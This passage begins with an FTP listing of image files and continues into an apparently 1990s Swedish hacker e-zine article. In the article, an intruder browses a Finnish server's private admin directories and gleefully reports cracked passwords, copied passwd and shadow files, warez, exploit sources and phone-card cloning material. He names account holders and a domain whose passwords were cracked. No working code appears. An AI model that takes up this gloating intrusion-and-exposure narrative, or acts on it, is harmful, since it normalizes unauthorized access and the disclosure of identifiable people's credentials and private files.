-rw-r--r-- 1 root root 50959 Jul 31 1995 ob_camp5.gif
-rw-r--r-- 1 root root 59502 Jul 31 1995 ob_camp6.gif
-rw-r--r-- 1 root root 39870 Jul 31 1995 ob_camp7.gif
-rw-r--r-- 1 root root 38377 Jul 31 1995 ob_camp8.gif
-rw-r--r-- 1 root root 228147 Jul 31 1995 oksana_bayul1.gif
-rw-r--r-- 1 root root 169752 Jul 31 1995 oksana_bayul2.gif
-rw-r--r-- 1 root root 123132 Jul 31 1995 oksna-17.jpg
-rw-r--r-- 1 root root 112161 Jul 31 1995 oksna-au.gif
-rw-r--r-- 1 root root 161280 Jul 31 1995 oksna-lm.jpg
-rw-r--r-- 1 root root 76255 Jul 31 1995 oksna-oi.jpg
-rw-r--r-- 1 root root 62121 Jul 31 1995 oksna-st.jpg
-rw-r--r-- 1 root root 81408 Jul 31 1995 pa-hwf1.jpg
-rw-r--r-- 1 root root 58387 Jul 31 1995 pa-mar92.jpg
-rw-r--r-- 1 root root 64982 Jul 31 1995 pa-nov93.jpg
-rw-r--r-- 1 root root 102037 Jul 31 1995 pa-pca1.jpg
-rw-r--r-- 1 root root 84502 Jul 31 1995 pa-pca2.jpg
-rw-r--r-- 1 root root 71168 Jul 31 1995 pa-port1.jpg
-rw-r--r-- 1 root root 87936 Jul 31 1995 pa-soaks.jpg
-rw-r--r-- 1 root root 68096 Jul 31 1995 pa-suita.jpg
-rw-r--r-- 1 root root 677512 Jul 31 1995 pamelada.gif
-rw-r--r-- 1 root root 18154 Jul 31 1995 pamiller.jpg
-rw-r--r-- 1 root root 160431 Jul 31 1995 pfeifer1.jpg
-rw-r--r-- 1 root root 54526 Jul 31 1995 pfeiffe3.jpg
drwxr-xr-x 2 root root 1024 Jul 31 1995 playmate
-rw-r--r-- 1 root root 248807 Jul 31 1995 poster.gif
-rw-r--r-- 1 root root 128122 Jul 31 1995 pvkergn3.gif
-rw-r--r-- 1 root root 88333 Jul 31 1995 pvkergn5.gif
-rw-r--r-- 1 root root 252220 Jul 31 1995 pvoksna1.gif
-rw-r--r-- 1 root root 299976 Jul 31 1995 pvsktmdl.gif
-rw-r--r-- 1 root root 1840 Jul 31 1995 readme.upl
-rw-r--r-- 1 root root 48329 Jul 31 1995 sandra.gif
-rw-r--r-- 1 root root 98223 Jul 31 1995 sandra_b.jpg
-rw-r--r-- 1 root root 533573 Jul 31 1995 sit.gif
-rw-r--r-- 1 root root 771 Jul 31 1995 skate_cat.gif
-rw-r--r-- 1 root root 9110 Jul 31 1995 spiral1.gif
-rw-r--r-- 1 root root 94769 Jul 31 1995 surya_bonaly1.gif
-rw-r--r-- 1 root root 26064 Jul 31 1995 surya_bonaly2.gif
-rw-r--r-- 1 root root 258337 Jul 31 1995 tanja_szewczenko.gif
-rw-r--r-- 1 root root 180200 Jul 31 1995 tanja_szewczenko2.gif
-rw-r--r-- 1 root root 101327 Jul 31 1995 tanja_szewczenko3.gif
-rw-r--r-- 1 root root 384265 Jul 31 1995 tloop.gif
-rw-r--r-- 1 root root 146359 Jul 31 1995 tonya_harding1.gif
-rw-r--r-- 1 root root 17428 Jul 31 1995 topthree.jpg
-rw-r--r-- 1 root root 221906 Jul 31 1995 zam.jpg
226 Transfer complete.
7618 bytes received in 1.3 seconds (5.6 Kbytes/s)
ftp> cd playmate
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 332
drwxr-xr-x 2 root root 1024 Jul 31 1995 .
drwxr-xr-x 3 root root 3072 Jul 31 1995 ..
-rw-r--r-- 1 root root 64712 Jul 31 1995 playmate-apr95.jpg
-rw-r--r-- 1 root root 18204 Jul 31 1995 playmate-aug95-b.jpeg
-rw-r--r-- 1 root root 27497 Jul 31 1995 playmate-dec94.jpg
-rw-r--r-- 1 root root 48368 Jul 31 1995 playmate-feb95.jpg
-rw-r--r-- 1 root root 26496 Jul 31 1995 playmate-jan95.jpg
-rw-r--r-- 1 root root 63759 Jul 31 1995 playmate-jun95-b.jpg
-rw-r--r-- 1 root root 23042 Jul 31 1995 playmate-mar95.jpg
-rw-r--r-- 1 root root 51941 Jul 31 1995 playmate-may95.jpg
226 Transfer complete.
733 bytes received in 0.097 seconds (7.4 Kbytes/s)
ftp>
_______________________________________________________________________________
8.2
En sysadmins samvete
av CB
[ F<>ljande artikel fick vi via mail fr<66>n ett konto som bergis inte
tillh<6C>r avs<76>ndaren. Texten var signerad CB, s<> det <20>r namnet som vi
s<>tter ut som artikelf<6C>rfattare. Tyv<79>rr k<>nde vi att det vore alltf<74>r
grymt att h<>nga ut vissa personer som omn<6D>mndes, d<>rf<72>r <20>r delar av
texten raderad, och vissa namn och adresser <20>r borttagna. Vi har
givetvis inte haft m<>jlighet att kontrollera n<>gon av uppgifterna. ]
Tur ar val att det finns sys admins. Hur skulle det annars se ut? Med en
massa users som hackar, tradar w4r3z, och beter sig allmant illa at..
Tja, det kan vara ngt att tanka pa.. Men forst sa kan ni kolla pa hur
olika sysadmin's bar sig at.. Hehe..
Till exempel pa -----.---.fi.. Kanske mera kant som ------- --------- --
----------.
Ett utdrag ur en ls -laR / ..
total 312
drwxr-xr-x 20 root root 1024 Jan 10 11:37 .
drwxr-xr-x 20 root root 1024 Jan 10 11:37 ..
drwxr-xr-x 10 webadmin webadmin 1024 Jan 11 17:25 WWW
drwxr-xr-x 2 root bin 2048 Jan 10 10:25 bin
drwxr-xr-x 2 root root 1024 Aug 28 00:36 boot
drwxr-xr-x 2 root root 4096 Jan 10 10:28 dev
drwxr-xr-x 9 root root 3072 Jan 12 13:09 etc
drwxrwxr-x 72 root root 2048 Jan 11 17:27 home
drwxr-xr-x 3 root root 1024 Aug 17 00:09 lib
drwxr-sr-x 6 list list 1024 Oct 26 23:19 list
drwxr-xr-x 2 root root 12288 Jul 10 1995 lost+found
drwxr-xr-x 2 root root 1024 Mar 16 1994 mnt
drwxrwxr-x 4 root root 1024 Nov 26 20:27 private
drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 private2
^^^^^^^^
Hmm, bara att det finns en group som heter TheDudez tyder ju pa att
sysadm verkar vara lite "oserios"..
dr-xr-xr-x 7 root root 0 Jan 10 12:28 proc
drwx------ 14 root root 2048 Jan 12 11:14 root
drwxr-xr-x 2 root bin 2048 Aug 28 01:06 sbin
drwxrwxrwt 5 root root 5120 Jan 12 19:00 tmp
drwxr-xr-x 20 root root 1024 Aug 22 16:55 usr
drwxr-xr-x 18 root root 1024 Jul 28 14:02 var
-r-------- 1 root root 273412 Sep 14 10:46 vmlinuz
Tja, ska vi borja med att kolla vad som finns i /private da..
/private:
total 6
drwxr-xr-x 4 root root 1024 Nov 26 20:27 .
drwxr-xr-x 20 root root 1024 Jan 10 11:37 ..
drwxr-xr-x 24 candyman nighteam 2048 Jan 12 15:36 candyman
drwxr-xr-x 24 pone nighteam 2048 Jan 12 08:45 pone
Tva stycken, enligt vad jag kan forsta sysadmins.. Eftersom de har egna
group's och ligger i /private som ar agd av root.. For att inte namna att
filer i deras hem-dir ar root-agda da.. Ska bli kul att se vad de har for
roligt..
/private/candyman:
total 711
drwxr-xr-x 24 candyman nighteam 2048 Jan 12 15:36 .
drwxrwxr-x 4 root root 1024 Nov 26 20:27 ..
-rw-r--r-- 1 candyman nighteam 0 Jul 11 1995 .addressbook
-rw-r--r-- 1 candyman nighteam 1257 Jul 11 1995 .addressbook.lu
-rw-r--r-- 1 candyman nighteam 451 Jan 12 13:19 .cshrc
-rw-r--r-- 1 candyman nighteam 481 Jan 10 12:35 .cshrc~
-rw-r--r-- 1 candyman nighteam 122 Jan 10 12:41 .emacs
-rw-r--r-- 1 candyman nighteam 24004 Aug 18 13:25 .fvwmrc
-rw-r--r-- 1 candyman nighteam 24002 Aug 18 12:49 .fvwmrc~
-rw-r--r-- 1 candyman nighteam 164 Jul 10 1995 .kermrc
-rw-r--r-- 1 candyman nighteam 34 Jun 6 1993 .less
-rw-r--r-- 1 candyman nighteam 114 Nov 24 1993 .lessrc
-rw-r--r-- 1 candyman nighteam 1 Dec 5 11:24 .login
-rw-r--r-- 1 candyman nighteam 25 Dec 1 10:41 .login~
-rw-r--r-- 1 candyman nighteam 0 Nov 6 16:07 .mc.ini
-rw-r--r-- 1 candyman nighteam 503 Nov 6 16:07 .mc.tree
drwx------ 2 candyman nighteam 1024 Jan 12 12:51 .ncftp
-rw------- 1 candyman nighteam 118 Dec 12 12:18 .ncrecent
drwx------ 3 candyman nighteam 1024 Dec 20 15:44 .netscape
-rw-r--r-- 1 candyman nighteam 2625 Jan 12 14:32 .netscape-bookmarks.html
drwx------ 2 candyman nighteam 24576 Jan 12 18:47 .netscape-cache
-rw------- 1 candyman nighteam 17401 Jul 25 13:18 .netscape-history
-rw-r--r-- 1 candyman nighteam 148361 Jul 24 10:53 .netscape-newsgroups-news
-rw-r--r-- 1 candyman nighteam 1686 Jan 12 14:30 .netscape-preferences
-rw------- 1 candyman nighteam 0 Jan 10 12:33 .news_time
-rw-r--r-- 1 candyman nighteam 13714 Jan 12 13:32 .newsrc
-rw-r--r-- 1 candyman nighteam 258392 Nov 20 14:59 .newsrc.8728
drwx------ 2 candyman nighteam 1024 Sep 4 20:38 .nn
-rw-r--r-- 1 candyman nighteam 13709 Jan 12 13:21 .oldnewsrc
-rw------- 1 candyman nighteam 712 Jan 11 13:24 .pine-interrupted-mail
-rw-r--r-- 1 candyman nighteam 5529 Jan 12 15:36 .pinerc
-rw-r--r-- 1 candyman nighteam 480 Jan 10 11:48 .plan
-rw-r--r-- 1 candyman nighteam 454 Dec 22 09:24 .plan~
-rw-r--r-- 1 candyman nighteam 58 Nov 15 14:55 .project
-rw-r--r-- 1 candyman nighteam 58 Nov 8 17:10 .project~
-rw-r--r-- 1 candyman nighteam 17 Sep 4 21:32 .signature
-rw-r--r-- 1 candyman nighteam 15 Oct 20 20:05 .slirprc
-rw-r--r-- 1 candyman nighteam 23 Oct 20 19:52 .slirprc~
-rw-r--r-- 1 candyman nighteam 63 Jan 12 13:19 .tcshrc
-rw-r--r-- 1 candyman nighteam 33 Jan 10 12:43 .tcshrc~
drwxr-xr-x 2 candyman nighteam 1024 Aug 25 13:49 .term
drwxr-xr-x 4 candyman nighteam 1024 Jan 12 13:32 .tin
-rw-r--r-- 1 candyman nighteam 94 Aug 18 12:35 .xinitrc
-rw-r--r-- 1 candyman nighteam 66 Aug 18 12:19 .xinitrc~
-rw-r--r-- 1 candyman nighteam 118372 Dec 19 16:33 Configure.help-1.3
drwxr-xr-x 9 candyman access 1024 Dec 14 14:29 Linux
drwx------ 2 candyman nighteam 1024 Nov 24 10:21 Mail
drwx------ 2 candyman nighteam 1024 Nov 24 10:21 News
drwx------ 3 candyman nighteam 1024 Oct 26 23:05 build
drwx------ 22 candyman nighteam 1024 Dec 14 15:44 download
drwx------ 5 candyman nighteam 1024 Dec 13 11:26 graphics
drwxr-xr-x 2 candyman nighteam 1024 Oct 12 12:33 html
-rwxr-xr-x 1 root root 8752 Jan 10 12:14 linuxfin.txt
drwx------ 2 candyman nighteam 1024 Jan 12 10:50 mail
-rw------- 1 candyman nighteam 1971 Jan 10 16:28 mbox
drwx------ 3 candyman nighteam 1024 Dec 13 12:39 netscape
drwx------ 2 candyman nighteam 2048 Oct 12 11:23 news
drwx------ 2 candyman nighteam 1024 Oct 10 13:10 para-proc
drwx------ 2 candyman nighteam 1024 Dec 7 14:54 prosa
drwx------ 2 candyman nighteam 1024 Jan 10 11:54 shadow
drwx------ 4 candyman nighteam 1024 Oct 12 11:29 source
drwxrwx--- 5 candyman access 1024 Jan 12 18:50 teddy
drwx------ 2 candyman nighteam 1024 Jan 10 10:47 tmp
Well, han hade en hel del skit.. Men i tmp kanske det finns ngt roligt..
Lat oss checka..
/private/candyman/tmp:
total 20
drwx------ 2 candyman nighteam 1024 Jan 10 10:47 .
drwxr-xr-x 24 candyman nighteam 2048 Jan 12 15:36 ..
-rw-r--r-- 1 root root 1470 Dec 15 00:25 aliases
-rwx------ 1 candyman nighteam 3617 Aug 8 17:52 evitech.fi
-rwx------ 1 candyman nighteam 250 Aug 11 11:44 guessed
-rwx------ 1 candyman nighteam 9 Aug 8 17:49 katjahmr
-rw-r--r-- 1 root root 5091 Jan 9 14:20 passwd
-r-------- 1 root root 3504 Jan 9 14:27 shadow
Hehe, joda.. Det skulle jag nog vilja saga.. Tre av filerna har han tydligen
satt upp nar han kort med root oxa.. Well, kanske ska beratta vad som
dojlde sig bakom nagra av filnamnen oxa.. Aven om de ar ratt sjalv
forklarande.. guessed inneholl nagra crackade passwd's till evitech.fi.
Det var tydligen crackat med Crack 4.1 kan jag ju oxa saga.. katjahmr
inneholl passwordet till usern katjahmr pa evitech.fi.. (Ett annat
password till samma konto fanns i guessed, sa de har antagligen bytt password
at henne..)
Ska well fortsatta, och kika lite pa vad pone kan dolja..
/private/pone:
total 5274
-rw-r--r-- 1 pone nighteam 44156 Dec 20 15:32 #sit.fi.sorted#
-rwx------ 1 pone nighteam 1399 Dec 4 09:00 %backup%~
drwxr-xr-x 24 pone nighteam 2048 Jan 12 08:45 .
drwxrwxr-x 4 root root 1024 Nov 26 20:27 ..
-rwx------ 1 pone nighteam 1246 Jan 12 08:41 .addressbook
-rw-r--r-- 1 pone nighteam 2573 Jan 12 08:41 .addressbook.lu
-rw------- 1 pone nighteam 542 Dec 20 16:45 .article
-rwx------ 1 pone nighteam 756 Dec 20 18:51 .cshrc
-rwx------ 1 pone nighteam 733 Dec 2 13:51 .cshrc~
-rw-r--r-- 1 pone nighteam 15 Dec 20 13:01 .forward
-rwx------ 1 pone nighteam 164 Jul 10 1995 .kermrc
-rwx------ 1 pone nighteam 34 Jun 6 1993 .less
-rwx------ 1 pone nighteam 114 Nov 24 1993 .lessrc
-rw-r--r-- 1 pone nighteam 6 Nov 26 20:42 .logout
-rwx------ 1 pone nighteam 25 Aug 14 03:12 .mailcap~
-rw-r--r-- 1 pone nighteam 0 Dec 20 08:53 .mc.ini
-rw-r--r-- 1 pone nighteam 70 Dec 20 08:53 .mc.tree
-rwx------ 1 pone nighteam 357 Aug 10 06:10 .netscape-bookmarks.html
drwxr-xr-x 2 pone nighteam 11264 Nov 24 19:50 .netscape-cache
-rwx------ 1 pone nighteam 91 Aug 10 06:10 .netscape-cookies
-rwx------ 1 pone nighteam 12923 Aug 14 04:13 .netscape-history
-rwx------ 1 pone nighteam 1568 Oct 23 20:22 .netscape-preferences
-rwx------ 1 pone nighteam 0 Jan 12 13:46 .news_time
-rw-r--r-- 1 pone nighteam 290356 Dec 20 19:39 .newsrc
-rw-r--r-- 1 pone nighteam 259272 Oct 15 17:02 .newsrc.20926
-rw-r--r-- 1 pone nighteam 159420 Dec 20 16:47 .oldnewsrc
drwxr-xr-x 2 pone nighteam 2048 Oct 29 20:11 .pics
-rw-r--r-- 1 pone nighteam 5657 Jan 12 08:45 .pinerc
-rw-r--r-- 1 pone nighteam 494 Aug 28 02:48 .plan
-rw-r--r-- 1 pone nighteam 12 Aug 28 02:50 .project
-rwx------ 1 pone nighteam 414 Dec 20 17:51 .signature
-rwx------ 1 pone nighteam 415 Nov 17 12:27 .signature~
drwx------ 2 pone nighteam 1024 Sep 19 09:04 .term
drwxr-xr-x 4 pone nighteam 1024 Dec 21 01:36 .tin
-rwx------ 1 pone nighteam 89 Aug 7 22:08 .xinitrc
-rw-r--r-- 1 pone nighteam 65792 Nov 16 22:44 690v100.img
drwx------ 2 pone nighteam 1024 Jul 28 13:02 Mail
drwx------ 2 pone nighteam 1024 Jul 28 13:02 News
-rw-rw-r-- 1 pone nighteam 15262 Nov 21 14:26 PPP-HOWTO.gz
-rw-r--r-- 1 pone nighteam 208339 Nov 21 19:38 alt.2600_FAQ,_Beta_.012_-_Part_1_1
-rw-r--r-- 1 pone nighteam 6133 Nov 21 19:38 alt.2600_Survival_Guide
drwxrwxr-x 2 pone nighteam 1024 Nov 16 09:33 arlan
dr-x------ 2 pone nighteam 1024 Nov 27 03:25 crontabs
-rw-r--r-- 1 pone nighteam 3877 Jan 11 18:14 cute.fi
-rw------- 1 pone bin 477 Dec 18 15:37 dead.letter
drwxr-xr-x 4 pone nighteam 1024 Nov 24 11:28 docs
drwxr-xr-x 4 pone nighteam 1024 Nov 30 20:32 download
-rwx------ 1 pone nighteam 216 Nov 6 21:09 falm
drwxr-xr-x 3 fear users 1024 Dec 11 16:02 fear
-rwx------ 1 pone nighteam 485 Nov 20 18:17 fmasi
-rwx------ 1 pone nighteam 485 Nov 20 18:16 fmasi~
-rwx------ 1 pone nighteam 238 Nov 6 21:21 fmm
-rwx------ 1 pone nighteam 437 Nov 6 21:41 fpone
-rw-r--r-- 1 pone nighteam 2076 Nov 1 20:18 homepage.html
-rw-r--r-- 1 pone nighteam 2001 Nov 1 19:57 homepage.html~
drwxr-xr-x 13 pone nighteam 1024 Dec 2 15:31 html
-rwx------ 1 pone nighteam 307 Dec 18 16:50 iafmail
-rwx------ 1 pone nighteam 312 Dec 18 16:50 iafmail~
-rw-r--r-- 1 pone nighteam 856989 Nov 23 11:49 ingres04.tar.Z
-rwx------ 1 pone nighteam 312 Nov 16 20:34 innomail
-rwx------ 1 pone nighteam 301 Nov 16 20:33 innomail~
drwxr-xr-x 3 pone nighteam 1024 Jan 12 01:57 log
-rw-r--r-- 1 pone nighteam 198 Dec 2 17:38 loggi
-rw------- 1 pone nighteam 1535 Nov 29 11:21 loki
drwxr-xr-x 2 pone nighteam 12288 Aug 25 13:30 lost+found
drwx------ 2 pone nighteam 1024 Jan 12 08:54 mail
-rwx------ 1 pone nighteam 588 Dec 2 13:43 masi
-rwx------ 1 pone nighteam 586 Nov 27 09:48 masi~
drwxr-xr-x 2 pone nighteam 1024 Dec 2 18:10 matts
-rw------- 1 pone nighteam 105106 Nov 28 17:50 mbox
drwxr-xr-x 2 root root 1024 Nov 24 11:47 mqueue
-rw------- 1 pone nighteam 1562829 Nov 24 20:38 nag.ps
-rw------- 1 pone nighteam 1562833 Nov 24 20:37 nag.ps~
drwx------ 2 pone nighteam 1024 Aug 7 01:34 news
drwxr-xr-x 7 nordman users 2048 Nov 28 14:55 nordman
-rw-r--r-- 1 pone nighteam 1620 Jan 11 18:28 otech.fi
drwx------ 2 pone nighteam 1024 Oct 15 16:51 passwd
-rwx------ 1 pone nighteam 542 Nov 28 13:09 pone
-rwx------ 1 pone nighteam 501 Nov 27 10:05 pone~
-rwx------ 1 pone nighteam 1435 Nov 27 03:05 q~
-rwxr--r-- 1 pone nighteam 1333 Nov 26 21:12 rooter
-rwxr--r-- 1 pone nighteam 1333 Nov 26 21:10 rooter~
-rwxr-xr-x 1 pone nighteam 438 Oct 27 18:40 setter
-rw-r--r-- 1 pone nighteam 44156 Dec 20 15:23 sit.fi
-rw-r--r-- 1 pone nighteam 44156 Dec 20 15:27 sit.fi.sorted
-rwx------ 1 pone nighteam 302 Jul 28 12:17 staffmail
-rwx------ 1 pone nighteam 301 Nov 15 13:54 studmail
-rwx------ 1 pone nighteam 302 Nov 15 13:54 studmail~
lrwxrwxrwx 1 pone nighteam 17 Dec 20 09:19 talk -> /usr/bin/talk.old
drwx------ 2 pone nighteam 1024 Jan 12 18:57 temp
drwx------ 4 pone nighteam 1024 Oct 15 16:53 texts
-rw-r--r-- 1 pone nighteam 811 Dec 19 14:24 trlog
Lite diverse passwd-filer fanns ju dar, blandannat.. I .pics fanns det porr..
(Onodigt att slosa utrymme i maget med en listning..) I download/win95/
fanns det en hel del w4r3z.. Hittar overhuvudtaget en hel del w4r3z och porr
lite overallt.. Sa jag hoppar direkt vad jag hittar i hacking-vag..
/private/pone/passwd:
total 5
drwx------ 2 pone nighteam 1024 Oct 15 16:51 .
drwxr-xr-x 24 pone nighteam 2048 Jan 12 08:45 ..
-rw------- 1 pone nighteam 376 Oct 15 16:12 ftp.aragorn.uio.no
-rw------- 1 pone nighteam 183 Oct 15 16:14 ftp.batnet.com
Tja, dar fanns tva passwd-filer.. Som han har varit lam nog att ta via ftp..
Bada var fake passwd's.. Well, over till /private2 da..
/private2:
total 22
drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 .
drwxr-xr-x 20 root root 1024 Jan 10 11:37 ..
drwxrwxr-x 2 ripper TheDudez 1024 Nov 22 11:10 Linux
drwxrwx--- 4 paul TheDudez 1024 Jan 9 19:41 Stuff
drwxrwx--- 4 paul TheDudez 5120 Jan 9 13:07 Warez
drwxrwxr-x 2 kea TheDudez 1024 Dec 15 14:46 algdata
-rwxrwx--- 1 kea TheDudez 396 Nov 28 13:25 htmler
-rwxr-x--- 1 ripper TheDudez 410 Nov 28 13:16 htmler.old
drwxr-xr-x 19 kea TheDudez 2048 Jan 12 18:27 kea
drwxr-xr-x 3 paul TheDudez 1024 Nov 28 14:13 library
drwxr-xr-x 23 paul TheDudez 2048 Jan 12 12:37 paul
drwxr-xr-x 13 ripper TheDudez 1024 Dec 29 01:57 phrack
drwxr-xr-x 25 ripper TheDudez 2048 Jan 12 17:09 ripper
drwxr-xr-x 2 paul TheDudez 1024 Jan 12 12:57 santtu.dellas.ner.jag.orkar.JUH
drwxr-xr-x 10 ted TheDudez 1024 Dec 28 19:06 ted
Tja, som ni ser.. Warez igen.. I Stuff fanns bland annat en passwd-fil igen..
I Warez, inte sa ovantat warez... I kea, som verkar vara webadmin, fanns
passwd-filer och crackade konton.. I paul fanns en massa porr, en del warez
och en del passwd-filer.. Har ar vad som fanns i phrack..
/private2/phrack:
total 22
drwxr-xr-x 13 ripper TheDudez 1024 Dec 29 01:57 .
drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 ..
-rw-r--r-- 1 ripper TheDudez 3072 Feb 14 1995 anarch.zip
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 11:49 aotd
drwxr-xr-x 2 ripper TheDudez 2048 Sep 26 11:56 ati
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 11:58 btr
drwxr-xr-x 2 ripper TheDudez 4096 Sep 26 12:20 cdc
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:34 dfp
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:35 fbi
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:39 informatik
drwxr-xr-x 2 ripper TheDudez 2048 Sep 26 12:52 kaos
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 12:58 lodcom
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 13:05 lol
drwxr-xr-x 2 ripper TheDudez 2048 Sep 26 13:44 misc
En hel del hp-zines har de samlat pa sig.. Och i misc, en massa blandade
hp-texter och utils.. Har ar ripper's dir..
/private2/ripper:
total 1190
drwxr-xr-x 25 ripper TheDudez 2048 Jan 12 17:09 .
drwxrwxr-x 13 root TheDudez 1024 Jan 12 12:56 ..
drwxr-xr-x 4 ripper TheDudez 3072 Nov 14 18:25 ..html
drwxr-xr-x 2 ripper TheDudez 1024 Sep 6 13:27 .LiCe
drwxr-xr-x 2 ripper TheDudez 1024 Sep 7 17:41 .a
-rw-r--r-- 1 ripper TheDudez 215 Sep 21 12:39 .addressbook
-rw-r--r-- 1 ripper TheDudez 1492 Sep 21 12:39 .addressbook.lu
-rw------- 1 ripper TheDudez 541 Dec 29 01:38 .article~
-rw-r--r-- 1 ripper TheDudez 41 Sep 21 19:55 .bash_history
-rw-r--r-- 1 ripper TheDudez 846 Nov 21 15:52 .cshrc
-rw-r--r-- 1 ripper TheDudez 846 Nov 9 20:50 .cshrc~
drwx------ 2 ripper TheDudez 1024 Jul 26 20:43 .elm
-rw-r--r-- 1 ripper TheDudez 41 Jan 11 12:53 .forward
-rw-r--r-- 1 ripper TheDudez 19 Jan 11 12:53 .forward_bara_forward
-rw-r--r-- 1 root root 41 Jan 9 14:02 .forward_old
-rw-r--r-- 1 ripper TheDudez 112 Jul 26 20:04 .ircrc
-rw-r--r-- 1 ripper TheDudez 164 Jul 10 1995 .kermrc
-rw-r--r-- 1 ripper TheDudez 34 Jun 6 1993 .less
-rw-r--r-- 1 ripper TheDudez 114 Nov 24 1993 .lessrc
-rw------- 1 ripper TheDudez 859 Jan 10 12:02 .letter~
-rw-r--r-- 1 ripper TheDudez 84 Aug 1 22:23 .login
-rw-r--r-- 1 ripper TheDudez 0 Dec 29 01:55 .mc.ini
-rw-r--r-- 1 ripper TheDudez 1328 Dec 29 01:55 .mc.tree
drwxr-xr-x 2 ripper TheDudez 1024 Dec 27 00:00 .ncftp
-rw------- 1 ripper TheDudez 0 Jan 12 17:06 .news_time
-rw-r--r-- 1 ripper TheDudez 2292 Jan 12 17:09 .newsrc
-rw-r--r-- 1 ripper TheDudez 2292 Jan 12 17:07 .oldnewsrc
-rw-r--r-- 1 ripper TheDudez 5488 Jan 12 17:06 .pinerc
-rw-r--r-- 1 ripper TheDudez 404 Sep 1 13:58 .plan
drwxr-xr-x 2 ripper TheDudez 1024 Sep 26 14:44 .procmail
-rw-r--r-- 1 ripper TheDudez 152 Sep 26 14:50 .procmailrc
-rw-r--r-- 1 ripper TheDudez 19 Aug 14 20:42 .project
-rw-r--r-- 1 ripper TheDudez 408 Jan 12 17:06 .signature
-rw-r--r-- 1 ripper TheDudez 465 Nov 9 20:48 .signature.old
-rw-r--r-- 1 ripper TheDudez 405 Aug 25 08:04 .signature~
drwx------ 2 ripper TheDudez 1024 Sep 19 08:10 .term
-rw------- 1 ripper TheDudez 639 Jul 29 06:07 .tia
drwxr-xr-x 4 ripper TheDudez 1024 Jan 12 17:09 .tin
drwxr-xr-x 12 ripper TheDudez 2048 Dec 28 21:54 Crack-4.1
-rw-r--r-- 1 ripper TheDudez 14939 Oct 30 07:18 Dip+SLiRP+CSLIP_v1.1
drwx------ 2 ripper TheDudez 1024 Sep 12 14:16 Mail
drwxr-xr-x 2 ripper TheDudez 4096 Jan 12 17:09 News
drwxr-x--- 2 ripper TheDudez 1024 Oct 31 17:29 bin
drwxr-xr-x 3 ripper TheDudez 1024 Sep 19 17:23 cipher
-rw-r--r-- 1 ripper TheDudez 770 Jan 9 13:08 crontab
-rw-r--r-- 1 ripper TheDudez 812635 Dec 26 23:55 de220e.exe
-rw-r--r-- 1 ripper TheDudez 819 Dec 28 21:45 dead.article
-rw------- 1 ripper bin 1121 Oct 21 23:16 dead.letter
drwxr-xr-x 2 ripper TheDudez 1024 Aug 14 20:56 dev
drwxr-xr-x 4 ripper TheDudez 1024 Nov 30 15:32 html
drwx------ 2 ripper TheDudez 1024 Jan 12 14:59 mail
-rw-r--r-- 1 ripper TheDudez 3003 Sep 26 19:48 mailer
drwxrwxr-x 2 ripper TheDudez 1024 Oct 26 15:53 mits
drwxr-xr-x 3 ripper TheDudez 1024 Nov 9 17:57 nc
drwxr-xr-x 2 ripper TheDudez 1024 Nov 24 21:42 net
-rw-r--r-- 1 ripper TheDudez 101455 Sep 19 19:20 net-tools-1.2.0.tar.gz
-rw-r--r-- 1 ripper TheDudez 396 Nov 9 20:47 output
-rw------- 1 ripper TheDudez 682 Sep 26 14:34 passu
-rw-r--r-- 1 ripper TheDudez 45056 Nov 6 11:37 passwd
drwxrwxr-x 2 ripper TheDudez 2048 Jan 12 11:01 pics
-rw-r--r-- 1 ripper TheDudez 95486 Sep 20 10:21 roots.net
drwxr-xr-x 3 ripper TheDudez 1024 Aug 31 19:42 screen
-rw-r--r-- 1 ripper TheDudez 8755 Sep 21 19:32 shcrack.c
-rw-r--r-- 1 ripper TheDudez 9716 Sep 21 19:37 spoof.c
-rw-r--r-- 1 ripper TheDudez 642 Sep 21 19:39 spoof.doc
drwxr-xr-x 2 ripper TheDudez 1024 Dec 7 23:46 stuff
-rw-r--r-- 1 ripper TheDudez 6155 Sep 28 16:31 sunny.sh
-rwx------ 1 ripper TheDudez 2277 Nov 9 20:49 taggit
-rw-r--r-- 1 ripper TheDudez 2002 Nov 9 20:33 tags
drwxr-xr-x 2 ripper TheDudez 1024 Dec 5 15:19 test
-rw-r--r-- 1 ripper TheDudez 21859 Nov 13 11:36 uucp.how
Well, en login-spoof, sniffers, passwd-filer, exploits, porr, cracker-prog,
crackade passwd-filer, en ratt fin samling dict-filer, krypterings-progs..
Heh, ripper skulle nastan kunna vara en av oss! :) Men.. Kanske inte precis
vad man vill ha som sysadm.. I ripper's mail fanns lite ql info oxa..
Detaljerad beskrivning och pascal-src for att gora en smartcard-lasare,
koppla in den till sin PC, och med programmet programmera om telefon-kort..
Programmet passade for kort fran Norge, Irland, Czech Republic (!?) och
Finland.. Hehe.. Well, det fanns en hel del tvivelaktiga saker pa det har
systemet..
<EOF>